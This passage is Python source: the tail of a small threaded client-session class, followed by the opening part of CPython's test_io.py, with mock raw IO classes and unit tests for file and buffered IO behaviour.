t1.daemon = True
t2.daemon = True
t1.start()
t2.start()
t1.join()
t2.join()
def listen(self):
while self.is_alive:
recv = self.sess.recv()
if recv:
self.recv.put(recv)
else:
self.is_alive = False
self.interface.disconnect_client(self.sess)
def recv_manager(self):
while self.is_alive:
if self.recv.qsize():
with self.lock:
recv = self.recv.get()
self.display_text('Data: {}'.format(recv['args']))
def send(self, code=None, args=None):
self.sess.send(code=code, args=args)
def display_text(self, text):
print('{0}{1}{0}'.format('\n\n\t', text))
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
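# A sketch of that pattern (illustrative; the real tests below do the same,
# attaching the io.* / _pyio.* types to subclasses as class attributes):
#
#   class ExampleTest(unittest.TestCase):
#       def test_roundtrip(self):
#           buf = self.BytesIO()          # provided by the concrete subclass
#           buf.write(b"data")
#           self.assertEqual(buf.getvalue(), b"data")
#
#   class CExampleTest(ExampleTest):
#       BytesIO = io.BytesIO              # C implementation
#
#   class PyExampleTest(ExampleTest):
#       BytesIO = pyio.BytesIO            # pure-Python implementation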
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import textwrap
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import (
assert_python_ok, assert_python_failure, run_python_until_end)
from test.support import FakePath, skip_if_sanitizer
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
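# The expected order [1, 2, 3] means __del__ ran first, then close(), and close() in turn invoked flush().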
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(support.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
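# A None entry in the mock's read sequence simulates a raw read that would block (no data available yet).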
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(os.fsencode(support.TESTFN)))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
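# Sentinel value used to check that bytes past the reported read count are left untouched.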
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
